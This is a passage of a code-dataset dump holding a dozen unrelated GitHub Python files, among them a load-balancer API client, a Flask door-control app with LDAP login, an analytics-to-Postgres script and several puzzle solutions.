certfile=certfile)\n else:\n cert = IntermediateCertificate(self.access_info, certificate)\n return cert\n\n def create_virtual_service(self, ip, port=80, protocol=\"tcp\"):\n return VirtualService(self.access_info, ip, port, protocol)\n\n def get_virtual_services(self):\n response = self._get(\"/listvs\")\n data = get_data(response)\n virtual_services = []\n services = data.get('VS', [])\n services = cast_to_list(services)\n for service in services:\n master_vs_id = int(service.get('MasterVSID', 0))\n if master_vs_id != 0:\n for vs in services:\n if int(vs.get(\"Index\", 0)) == master_vs_id:\n virt_serv = self.build_virtual_service(service, vs)\n else:\n virt_serv = self.build_virtual_service(service, response)\n virtual_services.append(virt_serv)\n return virtual_services\n\n def get_virtual_service(self, index=None, address=None, port=None,\n protocol=None):\n if index is None:\n validate_ip(address)\n validate_port(port)\n validate_protocol(protocol)\n service_id = {\"vs\": address, \"port\": port, \"prot\": protocol}\n else:\n service_id = {\"vs\": index}\n response = self._get(\"/showvs\", service_id)\n service = get_data(response)\n # again line below will fail with ValidationError if empty response\n virt_serv = self.build_virtual_service(service)\n return virt_serv\n\n def build_virtual_service(self, service, response=None):\n \"\"\"Create a VirtualService instance with populated with API parameters\n\n This does not include potentially attached real servers\n :param service: OrderedDict populated with virtual service data\n :param response: Optional response of a listvs call. This acts as a\n cache, if you want to create a lot of VirtualService\n objects in a row, such as with looping, you can call\n listvs and pass the response in each time and this\n will nullify the extra listvs calls.\n :return: VirtualService object with populated attributes\n \"\"\"\n is_sub_vs = True if int(service.get('MasterVSID', 0)) != 0 else False\n if is_sub_vs:\n # `response` needs to be a dict in here\n # Add lb properties to the sub vs\n if response is None:\n response = self._get(\"/showvs\",\n {\"vs\": service.get('MasterVSID')})\n parent_vs_data = get_data(response)\n else:\n parent_vs_data = response\n subvs_lb_props = get_sub_vs_list_from_data(parent_vs_data)[1]\n virt_serv = VirtualService(self.access_info, service.get('Index'),\n is_sub_vs=True)\n virt_serv.subvs_data = subvs_lb_props[service.get('Index')]\n virt_serv.subvs_data['parentvs'] = service.get('MasterVSID')\n else:\n # `response` needs to be a raw xml output here\n # Add any sub VSs to the top level VS\n if response is None:\n response = self._get(\"/listvs\")\n data = get_data(response)\n virt_serv = VirtualService(self.access_info,\n service.get('VSAddress'),\n service.get('VSPort'),\n service.get('Protocol'),\n is_sub_vs=False)\n virt_serv.subvs_entries = []\n services = get_dict_entry_as_list(\"VS\", data)\n this_vs_index = service.get('Index')\n for vs in services:\n # add subvs to parent vs\n if vs['MasterVSID'] == this_vs_index:\n subvs = VirtualService(self.access_info, vs['Index'],\n is_sub_vs=True)\n subvs.populate_default_attributes(vs)\n subvs_api_entries = service.get(\"SubVS\", [])\n subvs_api_entries = cast_to_list(subvs_api_entries)\n for subvs_api in subvs_api_entries:\n # add the \"Rs\" part of the subvs to the subvs instance\n if subvs_api[\"VSIndex\"] == subvs.index:\n subvs.subvs_data = subvs_api\n # Have to add a parentvs hook to make life easy\n subvs.subvs_data['parentvs'] = this_vs_index\n virt_serv.subvs_entries.append(subvs)\n virt_serv.populate_default_attributes(service)\n return virt_serv\n\n def get_all_objects(self):\n # x variables are the object while x_data is the OrderedDict\n virtual_services = []\n response = self._get(\"/listvs\")\n data = get_data(response)\n virtual_services_data = data.get('VS', [])\n virtual_services_data = cast_to_list(virtual_services_data)\n\n # create vs and rs objects at this point\n # loop through all vss and attach matching real server objects\n for service_data in virtual_services_data:\n master_vs_id = int(service_data.get('MasterVSID', 0))\n if master_vs_id != 0:\n for vs in virtual_services_data:\n if int(vs.get(\"Index\", 0)) == master_vs_id:\n virt_serv = self.build_virtual_service(service_data,\n vs)\n else:\n virt_serv = self.build_virtual_service(service_data, response)\n real_servers = cast_to_list(service_data.get(\"Rs\", []))\n for server_data in real_servers:\n rs = virt_serv.build_real_server(server_data)\n virt_serv.real_servers.append(rs)\n virtual_services.append(virt_serv)\n # replace subvs's with vs's that have RSs in them.\n for vs in virtual_services:\n for subvs in vs.subvs_entries:\n for top_level_vs in virtual_services:\n if subvs.index == top_level_vs.index:\n subvs.real_servers = top_level_vs.real_servers\n\n return virtual_services\n\n def clone_virtual_service(self, service, ip=None, port=None, protocol=None,\n enable=True,\n dry_run=False):\n \"\"\"Given a VirtualService instance, add it to this LoadMaster\n\n :param service: The VirtualService instance to clone\n :param ip: The new IP address of the virtual service\n :param port: The new port of the virtual service\n :param protocol: The new protocol of the virtual service\n :param enable: Enable the VirtualService\n :param dry_run: Don't save the VirtualSerivce immediately\n :return: The altered VirtualService tied to the this LoadMaster\n \"\"\"\n if not isinstance(service, VirtualService):\n raise NotVirtualServiceInstanceError()\n\n service.endpoint = self.endpoint\n service.ip_address = self.ip_address\n service.cert = self.cert\n\n service.index = None\n service.vs = ip or service.vs\n service.port = port or service.port\n service.prot = protocol or service.prot\n\n service.enable = get_api_bool_string(enable)\n\n if not dry_run:\n service.save()\n\n return service\n\n def upload_template(self, file):\n # Deprecated, use create_template\n response = self._post('/uploadtemplate', file)\n return send_response(response)\n\n def create_template(self, file):\n existing = self.templates.keys()\n\n self._post(\"/uploadtemplate\", file)\n\n uploaded_templates = {k: v for k, v in self.templates.items()\n if k not in existing}\n\n return uploaded_templates\n\n def get_templates(self):\n response = self._get(\"/listtemplates\")\n data = get_data(response)\n return list_object(Template, self.access_info, data)\n\n def get_template(self, name):\n # There is not 'get' for templates, only list.\n templates = self.get_templates()\n for template in templates:\n if template.name == name:\n return template\n\n def list_templates(self):\n # Backward compatability\n return self.get_templates()\n\n def delete_template(self, template_name):\n params = {'name': template_name}\n response = self._get('/deltemplate', parameters=params)\n return send_response(response)\n\n def apply_template(self, virtual_ip, port, protocol, template_name,\n nickname=None):\n params = {\n 'vs': virtual_ip,\n 'port': port,\n 'prot': protocol,\n 'name': template_name,\n }\n\n existing = self.vs.keys()\n\n if nickname is not None:\n params['nickname'] = nickname\n\n response = self._get(\"/addvs\", parameters=params)\n\n if is_successful(response):\n vs = {k: v for k, v in self.vs.items()\n if k not in existing}\n else:\n raise KempTechApiException(get_error_msg(response))\n\n return vs\n\n def get_sdn_controller(self):\n response = self._get('/getsdncontroller')\n return send_response(response)\n\n def get_sdn_info(self):\n response = self._get('/sdninfo')\n return send_response(response)\n\n\nclass LoadMasterGeo(LoadMaster, Geo):\n pass\n","repo_name":"dgquaid/python-kemptech-api","sub_path":"python_kemptech_api/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":50967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"74864584092","text":"def _read_input():\n with open(\"input.txt\", mode='r') as f:\n data = f.read().splitlines()\n\n # Получение чисел\n n = int(data[0])\n numbers = [int(i) for i in data[1].split()]\n\n return n, numbers\n\n\ndef _is_unique(numbers: list):\n \"\"\"\n Проверка на уникальность всех чисел.\n\n :param numbers: Числа.\n :return: True/False\n \"\"\"\n min_num = min(numbers)\n max_num = max(numbers)\n if min_num != max_num:\n return True, min_num, max_num\n return False, min_num, max_num\n\n\ndef _downgrading_large_numbers(n: int, numbers: list, min_num: int):\n \"\"\"\n Понижение больших чисел до >= текущему min значению.\n\n :param numbers: Числа.\n :return: Новые числа, количество операций.\n \"\"\"\n operation_count = 0\n for i in range(n):\n if numbers[i] >= 2 * min_num:\n del_op = numbers[i] // min_num - 1\n operation_count += del_op\n numbers[i] -= del_op * min_num\n\n return numbers, operation_count\n\n\ndef _change_min(numbers: list, min_num: int, max_num: int):\n \"\"\"\n Понизить минимальное значение посредством вычитания max - min.\n\n :param numbers: Числа.\n :return: Новые числа, количество операций.\n \"\"\"\n max_ind = numbers.index(max_num)\n numbers[max_ind] -= min_num\n op_count = 1\n return numbers, op_count\n\n\ndef _do_operation(n, numbers: list, operations: int):\n \"\"\"\n Алгоритм.\n\n :param numbers: Числа.\n :return: None.\n \"\"\"\n while True:\n is_unique, min_num, max_num = _is_unique(numbers)\n if not is_unique:\n break\n\n if max_num < 2 * min_num:\n # Если не кратные, не одинаковые и нет чисел >= 2 * min\n # Понижаем минимальное значение посредством вычитания max - min\n # (2N + 3N)\n numbers, op_count = _change_min(numbers, min_num, max_num)\n operations += op_count\n else:\n # Если не кратные и не одинако��ые...\n # Для чисел, которые больше min считаем количество операций,\n # пока они не будут менять min...\n # (2N)\n numbers, op_count = _downgrading_large_numbers(n, numbers, min_num)\n operations += op_count\n\n # Вывод количества операций\n print(operations)\n\n\ndef main():\n operation_count = 0\n n, numbers = _read_input()\n _do_operation(n, numbers, operation_count)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nmikolaychuk/yandex-contest-2017-var-3","sub_path":"task_f.py","file_name":"task_f.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30067136657","text":"\"\"\"\r\n\n\n **Mubashir** needs your help to filter out **Simple Numbers** from a given\nlist.\n\n### Simple Numbers\n\n 89 = 8^1 + 9^2\n 135 = 1^1 + 3^2 + 5^3\n\nCreate a function to collect these numbers from a given range between `a` and\n`b` (both numbers are inclusive).\n\n### Examples\n\n simple_numbers(1, 10) ➞ [1, 2, 3, 4, 5, 6, 7, 8, 9]\n \n simple_numbers(1, 100) ➞ [1, 2, 3, 4, 5, 6, 7, 8, 9, 89]\n \n simple_numbers(90, 100) ➞ []\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef simple_numbers(a, b):\n # 135 = 1^1 + 3^2 + 5^3\n L = [];\n for i in range(a,b+1):\n if isSimpleNumber(i):\n L.append(i);\n return L;\n \ndef isSimpleNumber(n):\n C = 0;\n for i in range(1,len(str(n))+1):\n #print(i,C,str(n)[i-1])\n C+= int(str(n)[i-1])** i;\n return C == n\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"FqFGnnffKRo8LKQKP_19.py","file_name":"FqFGnnffKRo8LKQKP_19.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72877436251","text":"#!/usr/bin/python2 -u\n\nimport logging\nimport random\nimport sys\nfrom datetime import datetime, timedelta\n\nfrom flask import Flask, Response, render_template, session, request, redirect, url_for\n\nimport acme\nimport config\nimport door_lib\nimport ldap_user.config as ldap_config\nfrom ldap_user.flipdotuser import FlipdotUser\nfrom ldap_user.webapp import FrontendError\n\nlogging.basicConfig(\n level=logging.DEBUG if config.DEBUG else logging.INFO,\n format=\"[%(levelname)s][%(name)s] %(message)s\")\nlog = logging.getLogger(\"web\")\n\napp = Flask(__name__, )\n\n@app.route('/')\ndef index():\n if 'uid' not in session:\n return render_template('login.html')\n else:\n open, open_raw = is_door_open()\n dn, user = FlipdotUser().getuser(session['uid'])\n return render_template('door.html',\n state=\"Open\" if open else \"Closed\",\n state_raw=open_raw, user=user)\n\n@app.route('/manifest.json')\ndef manifest():\n with open('templates/manifest.json') as f:\n data = f.read()\n return Response(data, mimetype='application/json')\n\n@app.route('/login', methods=['POST'])\ndef login():\n if request.method == 'POST':\n uid = request.form.get('uid', '')\n pwd = request.form.get('password', '')\n if not uid or not pwd:\n return redirect(\"/\", 302)\n try:\n ldap = FlipdotUser()\n valid, dn = ldap.login(uid, pwd)\n except FrontendError as e:\n return render_template(\"error.html\", message=e.message)\n if valid:\n session['uid'] = dn\n session['user'] = uid\n session['pass'] = pwd\n else:\n session.pop('uid', None)\n return redirect('/')\n else:\n return redirect('/')\n\n@app.route('/logout')\ndef logout():\n session.clear()\n return redirect(url_for('index'))\n\n@app.route('/door', methods=['POST'])\ndef door():\n if request.form.get('action', 'closedoor') == 'opendoor':\n\n if 'uid' not in session:\n return render_template('login.html')\n dn, user = FlipdotUser().getuser(session['uid'])\n if 'is_member' not in user['meta'] or not user['meta']['is_member']:\n return render_template(\"error.html\",\n message=\"You are not allowed to open the door.\")\n\n log.info(\"Opening door.\")\n door_lib.open()\n else:\n log.info(\"Closing door.\")\n door_lib.close()\n global door_time\n door_time = None\n return redirect(url_for('index'))\n\ncache_time = timedelta(seconds=10)\ndoor_time = None\ndoor_open = None\ndef is_door_open():\n if hasattr(config, 'fake_door') and config.fake_door:\n return (random.random() > 0.5, random.randint(1,999))\n global door_open, door_time\n if door_open and door_time and door_time + cache_time > datetime.utcnow():\n return door_open\n\n with door_lib.get_serial() as s:\n door_open = door_lib.get_state(s)\n door_time = datetime.utcnow()\n return door_open\n\nif __name__ == '__main__':\n log.info(\"argv: %s\", sys.argv)\n #tls = acme.ACME(app, staging=config.STAGING)\n app.secret_key = ldap_config.SECRET\n app.run(host=\"0.0.0.0\", port=config.PORT, debug=True,\n threaded=True, processes=0,\n use_reloader=False)\n #tls.stop()\n #tls.thread.join()\n\n","repo_name":"flipdot/door","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":3289,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"42946776132","text":"\"\"\"Day 7: No Space Left On Device\n\nhttps://adventofcode.com/2022/day/7\n\n\"\"\"\nfrom __future__ import annotations\n\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass AocData:\n name: str\n size: int | None = None\n children: dict | None = None\n parent: AocData | None = None\n\n @property\n def is_dir(self):\n return not self.size or self.children\n\n def __repr__(self):\n return (\n f'<{\"Dir\" if self.is_dir else \"File\"}: {self.name} | {self.size}>'\n )\n\n\ndef handle_cd(command, current_dir, root):\n \"\"\"No adding new roots\"\"\"\n destination = command.split()[1]\n if destination == '/':\n return root\n elif destination == '..':\n return current_dir.parent\n else:\n return current_dir.children[destination]\n\n\ndef handle_ls(command, current_dir, all_nodes):\n if current_dir.children is None:\n current_dir.children = {}\n children = command.split('\\n')[1:]\n for ch in children:\n ch_type, name = ch.split()\n new_node = AocData(name=name, parent=current_dir)\n if ch_type == 'dir':\n new_node.children = {}\n if ch_type.isdigit():\n new_node.size = int(ch_type)\n current_dir.children[name] = new_node\n\n if new_node.is_dir:\n all_nodes.append(new_node)\n\n\ndef parse(data):\n root = AocData(name='.', children={})\n current_dir = root\n all_nodes = [root]\n\n data = data.strip()\n for command in data.split('$ '):\n command = command.strip()\n if command.startswith('cd'):\n current_dir = handle_cd(command, current_dir, root)\n elif command.startswith('ls'):\n handle_ls(command, current_dir, all_nodes)\n return root, all_nodes\n\n\ndef calculate_size(node):\n if node.size:\n return node.size\n ch_size = 0\n for ch in node.children.values():\n if ch.is_dir and not ch.size:\n ch_size += calculate_size(ch)\n else:\n ch_size += ch.size\n node.size = ch_size\n return node.size\n\n\ndef traverse(node):\n for n in node.children.values():\n if n.is_dir:\n for subn in traverse(n):\n yield subn\n yield node\n\n\ndef solve(data):\n root, all_nodes = parse(data)\n calculate_size(root)\n return sum([n.size for n in traverse(root) if n.size <= 100000])\n\n\ndef solve2(data):\n root, all_nodes = parse(data)\n calculate_size(root)\n space_needed = 30000000 - (70000000 - root.size)\n return min([n.size for n in traverse(root) if n.size >= space_needed])\n\n\nif __name__ == '__main__':\n input_data = open('input_data.txt').read()\n\n result = solve(input_data)\n print(f'Example1: {result}')\n\n result = solve2(input_data)\n print(f'Example2: {result}')\n","repo_name":"lenarother/advent-of-code","sub_path":"adventofcode_2022/day_07/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1842389760","text":"import openai\nimport sys\nfrom config.config import OPENAI_KEY\n\nclass chatgpt_():\n\n def __init__(self,apitype=\"\",dict_args_input={}):\n \n self.dict_args={\n \"model\":\"text-davinci-003\",\n \"temperature\":0.9,\n \"max_tokens\":550,\n \"top_p\":1,\n \"frequency_penalty\":0.0,\n \"presence_penalty\":0.6,\n }\n # if apitype in (\"\"):\n # pass\n for k,v in dict_args_input:\n self.dict_args[k]=v\n\n def chat(self,mess):\n isok,response=self.openapi_(mess)\n \n if isok:\n sb_mess=[]\n for c in response.choices:\n if len(c.text)>1:\n sb_mess.append(c.text)\n return isok,\"\".join(sb_mess)\n else:\n return isok,\"error:{response}\"\n\n def openapi_(self,mess):\n openai.api_key = OPENAI_KEY\n try :\n response = openai.Completion.create(\n model=self.dict_args[\"model\"],\n prompt=str(mess),\n temperature=self.dict_args[\"temperature\"],\n max_tokens=self.dict_args[\"max_tokens\"],\n top_p=self.dict_args[\"top_p\"],\n frequency_penalty=self.dict_args[\"frequency_penalty\"],\n presence_penalty=self.dict_args[\"presence_penalty\"],\n #stop=[\" Human:\", \" AI:\"]\n )\n return True,response\n except Exception as ex:\n return False,str(ex)\n \n\n\n\nif __name__ == '__main__':\n if(len(sys.argv)>1):\n isok,responsestr=chatgpt_().chat(sys.argv[1])\n print(responsestr)","repo_name":"51ak/ChatGPT_Weixin","sub_path":"chatgpt/chatgpt_.py","file_name":"chatgpt_.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"} +{"seq_id":"26280152060","text":"\"\"\"Falling Apples\"\"\"\n\n# apples\n\nfrom sys import stdin, stdout\n\nrows, columns = map(int, stdin.readline().split())\nboard = []\ncurrent = {}\n\nfor i in range(rows):\n board.append(list(stdin.readline().rstrip()))\n\nfor i in range(columns):\n current[i] = rows - 1\n\nfor i in range(rows - 1, -1, -1):\n for j in range(columns):\n if board[i][j] == \"a\":\n board[i][j] = \".\"\n board[current[j]][j] = \"a\"\n current[j] -= 1\n elif board[i][j] == \"#\":\n current[j] = i - 1\n\nfor i in range(rows):\n stdout.write(\"\".join(board[i]) + \"\\n\")\n","repo_name":"lukaszlukaszew/kattis-solutions","sub_path":"A/apples.py","file_name":"apples.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34568098456","text":"\ndef intersectie(semiplane, Q):\n maximX, maximY = 9999999999, 9999999999\n minimX, minimY = -9999999999, -9999999999\n\n for semiplan in semiplane:\n # verificare semiplan vertical\n if semiplan[0] == 0:\n # vedem in ce parte a semiplanului se afla Q\n if (semiplan[2] + semiplan[1] * Q[1]) >= 0: # ecuatia dreptei care defineste semiplanul in functie de Qy\n continue # se afla in partea gresita\n else:\n if (semiplan[2] + semiplan[0] * Q[0]) >= 0: # semiplanul in functie de Qx\n continue\n\n if semiplan[0] == 0:\n # coordonata y a punctului de intersecție al semiplanei cu axa y.\n if -1 * semiplan[2] / semiplan[1] < Q[1]:\n # intersectia se afla deasupra deasupra lui Q\n minimY = max(minimY, -1 * semiplan[2] / semiplan[1])\n else:\n maximY = min(maximY, -1 * semiplan[2] / semiplan[1])\n else:\n if -1 * semiplan[2] / semiplan[0] < Q[0]:\n minimX = max(minimX, -1 * semiplan[2] / semiplan[0])\n else:\n maximX = min(maximX, -1 * semiplan[2] / semiplan[0])\n\n if max(maximX, maximY) == 9999999999 or min(minimX, minimY) == -9999999999:\n return 0 # nu exista dreptunghiuri\n return (maximX - minimX) * (maximY - minimY) # calculez valoarea ariilor\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n # citire date\n n = int(input())\n semiplane = []\n for i in range(n):\n line = input().split()\n semiplan = (float(line[0]), float(line[1]), float(line[2]))\n semiplane.append(semiplan)\n\n m = int(input())\n for i in range(m):\n linie = input().split()\n result = intersectie(semiplane, (float(linie[0]), float(linie[1])))\n if result == 0:\n print(\"NO\")\n else:\n print(\"YES\")\n print(result)\n","repo_name":"Ruxi12/An-2","sub_path":"Semestrul 2/AA/Tema3/Punct_fata_de_intersectii_de_semiplane.py","file_name":"Punct_fata_de_intersectii_de_semiplane.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14886476735","text":"import csv\nimport psycopg2\nfrom google.analytics.data_v1beta import BetaAnalyticsDataClient\nfrom google.analytics.data_v1beta.types import (\n DateRange,\n Dimension,\n Metric,\n RunReportRequest,\n)\nimport os\n\nDIR_PATH = os.path.abspath(os.path.dirname(__file__))\nfolder_name = \"\\_Output\"\nfilename = \"analytics_report.csv\"\npath = os.path.join(DIR_PATH, folder_name)\ntry:\n os.mkdir(path)\nexcept OSError as error:\n print(error)\n\nproperty_id = \"353814524\"\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"C:/Users/user3/Downloads/automation-25cff4119eb3.json\"\n\ndef format_date(date_str):\n year = date_str[:4]\n month = date_str[4:6]\n day = date_str[6:8]\n hour = date_str[8:10]\n return f\"{year}-{month.zfill(2)}-{day.zfill(2)} {hour}:00:00\"\n\ndef sample_run_report(property_id):\n client = BetaAnalyticsDataClient()\n\n request = RunReportRequest(\n property=f\"properties/{property_id}\",\n dimensions=[Dimension(name=\"dateHour\")],\n metrics=[\n Metric(name=\"sessions\"),\n Metric(name=\"screenPageViews\"),\n Metric(name=\"eventCount\"),\n Metric(name=\"userEngagementDuration\"),\n ],\n date_ranges=[DateRange(start_date=\"2022-06-01\", end_date=\"today\")],\n )\n response = client.run_report(request)\n\n csv_filename = os.path.join(path, filename)\n\n print(\"Report result:\")\n with open(csv_filename, mode=\"w\", newline=\"\") as file:\n writer = csv.writer(file)\n writer.writerow([\"Date\", \"Sessions\", \"Screen Pageviews\", \"Event Count\", \"User Engagement Duration\"])\n\n for row in response.rows:\n date = format_date(row.dimension_values[0].value)\n sessions = row.metric_values[0].value\n screen_pageviews = row.metric_values[1].value\n event_count = row.metric_values[2].value\n user_engagement_duration = row.metric_values[3].value\n\n writer.writerow([date, sessions, screen_pageviews, event_count, user_engagement_duration])\n\n print(f\"Data has been saved to {csv_filename}\")\n\ndef table(filename):\n conn = psycopg2.connect(host='localhost', dbname='postgres', user='postgres', password='1234', port=5432)\n cur = conn.cursor()\n path = os.path.join(DIR_PATH, folder_name, filename)\n\n # Create table\n cur.execute('''CREATE TABLE IF NOT EXISTS DATA(\n Date TIMESTAMP NOT NULL,\n sessions INTEGER,\n screenPageViews INTEGER,\n eventCount INTEGER,\n userEngagementDuration INTEGER)''')\n\n print(\"Table created\")\n\n # Copy data from CSV\n sql2 = f'''COPY DATA(Date, Sessions, ScreenPageviews, EventCount, UserEngagementDuration)\n FROM '{path}'\n DELIMITER ','\n CSV HEADER;'''\n\n cur.execute(sql2)\n conn.commit()\n cur.close()\n conn.close()\n\nprint(filename)\nsample_run_report(property_id)\ntable(filename)\n","repo_name":"KHemanth2001/google-analytics","sub_path":"GA_postgres.py","file_name":"GA_postgres.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37577560342","text":"class Node:\r\n def __init__(self,data):\r\n self.data = data\r\n self.next = None\r\n\r\nclass LinkedList:\r\n def __init__(self):\r\n self.head = None\r\n \r\n#Add node at begining\r\n def pushAtBeg(self,new_data):\r\n new_node = Node(new_data)\r\n new_node.next = self.head\r\n self.head = new_node\r\n\r\n#Add node after a given node\r\n def pushAfter(self,prev_node , new_data):\r\n if(prev_node is None):\r\n print(\"Given Previous node must be in list\")\r\n return\r\n new_node = Node(new_data)\r\n new_node.next = prev_node.next\r\n prev_node.next = new_node\r\n\r\n#Add node at end\r\n def pushAtEnd(self, new_data):\r\n new_node = Node(new_data)\r\n #if ll is empty, make newnode as \r\n if(self.head is None):\r\n self.head = new_node\r\n return\r\n #else traverse till last node\r\n last = self.head\r\n while(last.next):\r\n last = last.next\r\n #change the next of last node\r\n last.next = new_node\r\n\r\n def printList(self):\r\n temp = self.head\r\n while(temp):\r\n print(temp.data, end = \" \")\r\n temp = temp.next\r\n\r\nif __name__ == \"__main__\":\r\n l = LinkedList()\r\n l.pushAtBeg(5)\r\n l.pushAtBeg(4)\r\n l.pushAfter(l.head,6)\r\n l.pushAtEnd(7)\r\n l.pushAfter(l.head.next , 0)\r\n print(\"Linked List :\")\r\n l.printList()\r\n \r\n \r\n","repo_name":"Vaishnavi2707/DSAlgo","sub_path":"linkedlist/insertion.py","file_name":"insertion.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18628958163","text":"from typing import List\nfrom market_data.bar import Bar\nfrom indicators.sma import SMA\n\n\nclass VWAP:\n \"\"\"\n Volume Weighted Average Price (VWAP) indicator.\n \"\"\"\n\n def __init__(self, window: int) -> None:\n \"\"\"\n Constructor for the VWAP indicator.\n\n Parameters:\n window (int): The number of bars to use in the calculation.\n \"\"\"\n self.window = window\n self.sma = SMA(window)\n\n def calculate(self, bars: List[Bar]) -> float:\n \"\"\"\n Calculates the VWAP for the given bars.\n\n Parameters:\n bars (List[Bar]): A list of bars.\n\n Returns:\n float: The VWAP value.\n \"\"\"\n typical_prices = [(bar.high + bar.low + bar.close) / 3 for bar in bars]\n volumes = [bar.volume for bar in bars]\n\n # Calculate the typical price * volume values\n tpv_values = [tp * vol for tp, vol in zip(typical_prices, volumes)]\n\n # Calculate the cumulative sum of the typical price * volume values and volumes\n tpv_cumulative_sum = [sum(tpv_values[:i+1]) for i in range(len(tpv_values))]\n volume_cumulative_sum = [sum(volumes[:i+1]) for i in range(len(volumes))]\n\n # Calculate the VWAP using the SMA\n vwap = self.sma.calculate(tpv_cumulative_sum, volume_cumulative_sum)\n\n return vwap\n","repo_name":"spacewink9/Spacewink-Terminal-","sub_path":"indicators/vwap.py","file_name":"vwap.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"7025045884","text":"from pathlib import Path\nimport warnings\nfrom sys import exit, argv\nimport numpy as np\nfrom .kltpicker import KLTPicker\nfrom .util import trig_interpolation\nfrom .kltpicker_input import parse_args, get_args, progress_bar, check_num_finished, check_for_newer_version, check_output_dir\nimport mrcfile\nfrom .micrograph import Micrograph\nfrom .cryo_utils import downsample, downsample_gpu\nimport multiprocessing as mp\nimport os\nimport time\nwarnings.filterwarnings(\"ignore\")\n\n# Check if CuPy is installed and we have GPU devices\ntry:\n import cupy as cp\n cp.cuda.runtime.getDeviceCount()\n HAS_CUPY = 1\nexcept:\n HAS_CUPY = 0\n\ndef process_micrograph(micrograph, picker):\n micrograph.cutoff_filter(picker.patch_size)\n micrograph.estimate_rpsd(picker.patch_size, picker.max_iter, picker.no_gpu)\n micrograph.approx_noise_psd = micrograph.approx_noise_psd + np.median(micrograph.approx_noise_psd) / 10\n micrograph.prewhiten_micrograph(picker.no_gpu)\n micrograph.estimate_rpsd(picker.patch_size, picker.max_iter, picker.no_gpu) \n micrograph.psd = np.abs(trig_interpolation(np.pi * micrograph.r.astype('float64'), micrograph.approx_clean_psd,\n picker.rho.astype('float64')))\n micrograph.construct_klt_templates(picker)\n num_picked_particles, num_picked_noise = micrograph.detect_particles(picker)\n return [micrograph.mrc_name, num_picked_particles, num_picked_noise]\n\ndef get_micrograph(mrc_file, mgscale, no_gpu):\n \"\"\"Reads an mrc file and downsamples it.\"\"\"\n mrc = mrcfile.open(mrc_file, permissive=True)\n mrc_data = mrc.data.astype('float64').transpose()\n mrc.close()\n mrc_size = mrc_data.shape\n mrc_data = np.rot90(mrc_data)\n if no_gpu:\n mrc_data = downsample(mrc_data, (np.floor(np.multiply(mgscale, mrc_size))).astype(int))\n else:\n mrc_data = downsample_gpu(cp.asarray(mrc_data), (np.floor(np.multiply(mgscale, mrc_size))).astype(int))\n if np.mod(mrc_data.shape[0], 2) == 0: # Odd size is needed.\n mrc_data = mrc_data[0:-1, :]\n if np.mod(mrc_data.shape[1], 2) == 0: # Odd size is needed.\n mrc_data = mrc_data[:, 0:-1]\n mrc_data = mrc_data - np.mean(mrc_data.transpose().flatten())\n mrc_data = mrc_data / np.linalg.norm(mrc_data, 'fro')\n mc_size = mrc_data.shape\n micrograph = Micrograph(mrc_data, mc_size, mrc_file.name, mrc_size)\n return micrograph\n\ndef get_mempool_usage(param, gpu_index):\n \"\"\"\n Calculate how much memory is used in the GPU by a single process on one mrc.\n\n \"\"\"\n with cp.cuda.Device(gpu_index): \n mrc_file = param[0]\n picker = param[1]\n start = cp.cuda.runtime.memGetInfo()[0]\n micrograph = get_micrograph(mrc_file, picker.mgscale, picker.no_gpu)\n process_micrograph(micrograph, picker)\n finish = cp.cuda.runtime.memGetInfo()[0]\n mem_usage = (start-finish)*1.2\n return mem_usage\n\ndef calc_procs_per_gpu(mem_usage, max_processes, gpu_indices):\n \"\"\"\n Find how many available GPUs there are, and for each available GPU compute\n the maximal number of processes that can use it (based on memory usage).\n \"\"\"\n num_available_cpus = min(mp.cpu_count(), max_processes)\n procs_per_gpu = {}\n for gpu_index in gpu_indices:\n if sum(procs_per_gpu.values()) < num_available_cpus:\n cp.cuda.runtime.setDevice(gpu_index)\t\n free_mem = cp.cuda.runtime.memGetInfo()[0]\n procs_per_gpu[gpu_index] = min(np.floor(free_mem/mem_usage), num_available_cpus - sum(procs_per_gpu.values()))\n else:\n procs_per_gpu[gpu_index] = 0\n return procs_per_gpu\n\n \ndef multi_process_micrograph_gpu(param):\n \"\"\"\n Process micrographs in parallel, using GPU.\n \"\"\"\n # Unpack parameters (pool.map can map only one argument per function call).\n mrc_file = param[0]\n picker = param[1]\n gpu_index = param[2]\n with cp.cuda.Device(gpu_index):\n micrograph = get_micrograph(mrc_file, picker.mgscale, picker.no_gpu)\n summary = process_micrograph(micrograph, picker)\n if picker.verbose: # User requested detailed output.\n num_finished = check_num_finished(picker.output_particles / 'star', picker.start_time)\n print(time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - picker.start_time)) + \" - Picked %d particles and %d noise images out of %s. (%3d%s)\" %(summary[1], summary[2], summary[0], 